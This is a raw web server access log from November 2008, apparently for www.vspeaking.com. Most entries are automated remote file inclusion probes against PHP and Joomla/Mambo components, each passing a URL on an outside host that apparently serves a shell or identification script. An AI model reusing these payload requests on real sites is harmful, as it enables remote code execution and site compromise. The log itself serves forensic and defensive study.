98.210.195.32 - - [02/Nov/2008:16:01:01 -0800] "GET /logs/access_080804.log/errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.210.195.32 - - [02/Nov/2008:16:01:33 -0800] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
208.75.224.226 - - [02/Nov/2008:16:02:15 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.75.224.226 - - [02/Nov/2008:16:02:15 -0800] "GET //vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.75.224.226 - - [02/Nov/2008:16:02:15 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
65.55.208.254 - - [02/Nov/2008:16:06:29 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.55.208.254 - - [02/Nov/2008:16:06:29 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
80.67.28.10 - - [02/Nov/2008:16:06:35 -0800] "GET /logs/access_080804.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
211.202.2.220 - - [02/Nov/2008:16:06:51 -0800] "GET /logs/access.log/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.202.2.220 - - [02/Nov/2008:16:06:52 -0800] "GET /errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.202.2.220 - - [02/Nov/2008:16:06:53 -0800] "GET /logs/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.30.65.33 - - [02/Nov/2008:16:08:07 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
72.30.65.33 - - [02/Nov/2008:16:08:30 -0800] "GET /logs/access_080721.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:16:20:14 -0800] "GET /logs/access_080811.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:16:20:15 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:16:20:17 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
212.92.23.117 - - [02/Nov/2008:16:24:03 -0800] "GET /?sourcedir=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
212.92.23.117 - - [02/Nov/2008:16:24:03 -0800] "GET /logs/access_080804.log/?sourcedir=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
212.92.23.117 - - [02/Nov/2008:16:24:03 -0800] "GET /logs/?sourcedir=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
208.75.224.226 - - [02/Nov/2008:16:26:55 -0800] "GET /logs/access_080811.log/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
211.51.221.135 - - [02/Nov/2008:16:28:09 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.51.221.135 - - [02/Nov/2008:16:28:10 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.51.221.135 - - [02/Nov/2008:16:28:10 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.109.245.113 - - [02/Nov/2008:16:30:20 -0800] "GET /logs/access_080825.log//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.109.245.113 - - [02/Nov/2008:16:30:20 -0800] "GET /components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.109.245.113 - - [02/Nov/2008:16:30:20 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:16:33:12 -0800] "GET /logs/access_080825.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:16:35:21 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:16:35:21 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:16:35:22 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:16:35:22 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:16:35:22 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.vspeaking.com"
198.65.247.14 - - [02/Nov/2008:16:35:22 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:16:41:28 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
69.65.104.52 - - [02/Nov/2008:16:45:02 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.65.104.52 - - [02/Nov/2008:16:45:02 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.65.104.52 - - [02/Nov/2008:16:45:03 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
85.214.61.186 - - [02/Nov/2008:16:48:33 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.214.61.186 - - [02/Nov/2008:16:48:33 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.214.61.186 - - [02/Nov/2008:16:48:33 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:16:49:46 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.30.79.49 - - [02/Nov/2008:16:50:46 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
72.30.79.49 - - [02/Nov/2008:16:51:06 -0800] "GET /logs/access_080602.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
211.202.2.220 - - [02/Nov/2008:16:51:41 -0800] "GET /logs/access_080811.log/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
124.81.96.76 - - [02/Nov/2008:16:56:06 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
124.81.96.76 - - [02/Nov/2008:16:56:06 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:16:57:05 -0800] "GET /logs/access_080825.log//e404.php?DOCUMENT_ROOT=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:16:57:05 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:16:57:10 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:17:00:30 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:17:00:32 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:17:00:33 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
213.165.84.215 - - [02/Nov/2008:17:05:09 -0800] "GET /logs/access_080825.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.165.84.215 - - [02/Nov/2008:17:05:10 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.165.84.215 - - [02/Nov/2008:17:05:10 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:17:06:26 -0800] "GET /logs/access_080804.log//components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:17:06:26 -0800] "GET /components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:17:06:26 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:17:13:44 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:17:13:45 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:17:13:45 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
74.53.124.98 - - [02/Nov/2008:17:19:31 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:17:19:42 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:17:19:42 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:17:19:42 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
74.53.124.98 - - [02/Nov/2008:17:22:31 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
74.53.124.98 - - [02/Nov/2008:17:22:31 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
74.53.124.98 - - [02/Nov/2008:17:22:31 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
66.172.9.3 - - [02/Nov/2008:17:25:31 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.172.9.3 - - [02/Nov/2008:17:25:31 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.172.9.3 - - [02/Nov/2008:17:25:31 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
74.53.124.98 - - [02/Nov/2008:17:26:17 -0800] "GET /logs/access_080804.log//newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.85.114.130 - - [02/Nov/2008:17:26:42 -0800] "GET /logs/access_080825.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
70.85.114.130 - - [02/Nov/2008:17:26:42 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
70.85.114.130 - - [02/Nov/2008:17:26:42 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:17:28:54 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:17:28:54 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
216.32.94.162 - - [02/Nov/2008:17:29:18 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.32.94.162 - - [02/Nov/2008:17:29:18 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.53.141.2 - - [02/Nov/2008:17:29:20 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.53.141.2 - - [02/Nov/2008:17:29:20 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
94.76.199.10 - - [02/Nov/2008:17:30:18 -0800] "GET /logs/access.log HTTP/1.1" 200 17707 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.6) Gecko/20011202" "www.vspeaking.com"
193.95.93.158 - - [02/Nov/2008:17:31:28 -0800] "GET /logs/access_080825.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
193.95.93.158 - - [02/Nov/2008:17:31:28 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
193.95.93.158 - - [02/Nov/2008:17:31:29 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
151.1.233.89 - - [02/Nov/2008:17:32:18 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.viponline.com.br/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
151.1.233.89 - - [02/Nov/2008:17:32:18 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.viponline.com.br/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.32.94.162 - - [02/Nov/2008:17:33:05 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:17:34:29 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
64.38.4.3 - - [02/Nov/2008:17:34:42 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.38.4.3 - - [02/Nov/2008:17:34:42 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.38.4.3 - - [02/Nov/2008:17:34:42 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:17:35:55 -0800] "GET /logs/access_080811.log//components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
203.146.26.91 - - [02/Nov/2008:17:36:24 -0800] "GET /logs/access.log//bbs/skin/zero_vote/error.php?dir=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.146.26.91 - - [02/Nov/2008:17:36:25 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.146.26.91 - - [02/Nov/2008:17:36:25 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:17:36:34 -0800] "GET /logs/access_080811.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:17:43:23 -0800] "GET /logs/access_080811.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
216.32.94.162 - - [02/Nov/2008:17:45:11 -0800] "GET /logs/access_080811.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.53.141.2 - - [02/Nov/2008:17:48:05 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.145.117.130 - - [02/Nov/2008:17:50:45 -0800] "GET /errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.145.117.130 - - [02/Nov/2008:17:50:45 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.145.117.130 - - [02/Nov/2008:17:50:45 -0800] "GET /logs/access.log/errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
216.65.1.253 - - [02/Nov/2008:17:57:25 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
210.86.238.70 - - [02/Nov/2008:17:59:46 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
98.210.195.32 - - [02/Nov/2008:18:05:55 -0800] "GET /logs/access.log/errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.210.195.32 - - [02/Nov/2008:18:05:55 -0800] "GET /errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.210.195.32 - - [02/Nov/2008:18:05:55 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
77.232.68.10 - - [02/Nov/2008:18:07:01 -0800] "GET /logs/access_080804.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.232.68.10 - - [02/Nov/2008:18:07:01 -0800] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.232.68.10 - - [02/Nov/2008:18:07:01 -0800] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
210.219.173.249 - - [02/Nov/2008:18:08:25 -0800] "GET /logs/access_080825.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.219.173.249 - - [02/Nov/2008:18:08:25 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:18:11:25 -0800] "GET /logs/access_080825.log///e404.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:18:11:25 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:18:11:26 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
